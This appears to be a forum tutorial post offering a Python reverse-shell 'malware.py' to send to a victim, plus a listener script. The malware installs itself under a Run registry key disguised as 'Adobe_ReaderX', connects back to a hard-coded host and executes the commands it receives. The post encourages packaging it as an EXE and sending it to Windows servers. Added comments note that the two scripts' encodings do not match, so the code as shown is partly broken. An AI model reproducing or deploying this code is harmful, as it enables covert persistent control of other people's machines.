Reverse Shell tutorial
This post was last modified over a year ago and as such, information in it may be outdated (or the post may be outright broken).
Hey Guys, Finlay Here
Today I present to you a reverse shell script I built during some boredom.
I have the proof that it works here:
View the Proof! Here is the "malware.py" (which you send to the victim):
# Please support me and my development by making a donation to:
# BTC: 1Gay22nGSs5tXArmABtSHGjKQTerMpptFV
import sys, base64, os, socket, subprocess
from _winreg import *
def autorun(tempdir, fileName, run):
    """Copy this program into %TEMP% and register a Run value for it under HKLM.

    Persistence mechanism of the script: the file is copied with cmd.exe's
    `copy`, then a value is written under the Run key passed in `run` so that
    Windows launches it again at logon.

    Args:
        tempdir: destination directory string, passed verbatim to cmd.exe
            (the caller passes the literal '%TEMP%', which cmd.exe expands).
        fileName: path of the file to copy (the caller passes sys.argv[0]).
        run: registry path (relative to HKEY_LOCAL_MACHINE) of the Run key.

    Defender notes (all visible in the code below):
      * Writing under HKLM with KEY_ALL_ACCESS needs elevated rights; every
        WindowsError is swallowed, so a failed write is silent.
      * Artifacts to look for: a Run value named 'Adobe_ReaderX' whose data
        is r"%TEMP%\mw.exe", and a cmd.exe `copy` into %TEMP% spawned by the
        dropped process.
    """
    # Copy executable to %TEMP%:
    # fileName and tempdir are interpolated unquoted into a shell command line,
    # so a path containing spaces would be split by cmd.exe.
    os.system('copy %s %s'%(fileName, tempdir))
    # Queries Windows registry for the autorun key value
    # Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        # EnumValue has no explicit end marker: it raises WindowsError once
        # the index runs past the last value, which terminates this loop.
        i = 0
        while True:
            subkey = EnumValue(key, i)
            # subkey[0] is the value name; only names are collected.
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
    # If the autorun key "Adobe ReaderX" isn't set this will set the key:
    # NOTE: the name checked here ('Adobe ReaderX') differs from the name
    # written below ('Adobe_ReaderX'), so this check never matches a value
    # written by this same code.
    if 'Adobe ReaderX' not in runkey:
        try:
            # Reopen with write access; this is the step that needs admin rights.
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            # REG_SZ value pointing at a fixed file name in %TEMP%. Note that
            # the copy above keeps whatever name fileName had; nothing here
            # renames it to mw.exe.
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            # Access denied (or any other registry error) is ignored silently.
            pass
def shell():
    """Connect back to the hard-coded listener and run received lines as shell commands.

    Network behaviour visible below: an outbound TCP connection to
    10.0.0.144:1998, a plaintext banner, then a loop of
    recv() -> execute via the system shell -> send base64-encoded output.
    Each received chunk (up to 1024 bytes) is handed to subprocess with
    shell=True, so every command spawns a cmd.exe child of this process.

    NOTE: the output is base64-encoded, while the companion command.py on this
    page XOR-transforms what it sends and receives; the two scripts as written
    do not use the same encoding.
    """
    #Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Listener address/port are fixed at build time (see the note after the script).
    s.connect(('10.0.0.144', int(1998)))
    # Plaintext banner — a straightforward network signature for this sample.
    s.send('[*] Connection Established!')
    while 1:
        # One recv() is treated as one complete command; no framing.
        data = s.recv(1024)
        if data == "quit": break
        # shell=True: the received text is interpreted by the system shell.
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        # stdout is drained fully before stderr is read.
        stdout_value = proc.stdout.read() + proc.stderr.read()
        # Output goes back base64-encoded (obfuscation only, not confidentiality).
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()
def main():
    """Install persistence, then hand control to the reverse shell loop.

    autorun() runs first and returns regardless of whether the registry write
    succeeded (its errors are swallowed); shell() then blocks until the
    connection ends.
    """
    # Left unexpanded on purpose: cmd.exe expands %TEMP% in the copy command.
    tempdir = '%TEMP%'
    # Path the script/executable was launched as.
    fileName = sys.argv[0]
    # Non-raw string: in Python 2, \M \W \C \R are not recognised escapes and
    # are kept literally, so this still spells the HKLM Run key path.
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()
# Script entry point (Python 2: print statements and _winreg above).
if __name__ == "__main__":
    main()
Please note that you need to change the IP and port to suit your scenario.
Also here is the command.py (which should be running on your box!)
import socket
# Listener side: accepts one connection and relays typed commands to it.
# Binds on all interfaces with no authentication, so anything that can
# reach TCP/1998 gets the prompt below.
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 1998))
s.listen(2)
print "Listening on port 1998... "
# Only the first client is ever served; later connections stay queued.
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip
# Loop has no break, so the two close() calls after it are unreachable;
# the script ends via Ctrl-C or an exception on the socket.
while True:
    command = raw_input('~$ ')
    # Single-byte XOR with 0x41 — obfuscation only, trivially reversible.
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^=0x41
    client.send(encode)
    # One recv() of up to 2048 bytes is treated as the whole reply.
    en_data=client.recv(2048)
    # Same XOR applied to the reply. NOTE: malware.py on this page sends its
    # output base64-encoded, not XOR-encoded, so this decode does not match it.
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^=0x41
    print decode
client.close()
s.close()
So these scripts are built fairly easily, and probably not very effective.
But when you build them into an EXE (PyInstaller anyone?), send them to a Windows server, and boom, you're a god now! (sorta...) Please use these scripts for education only!
I'm not going to help you if you get in trouble!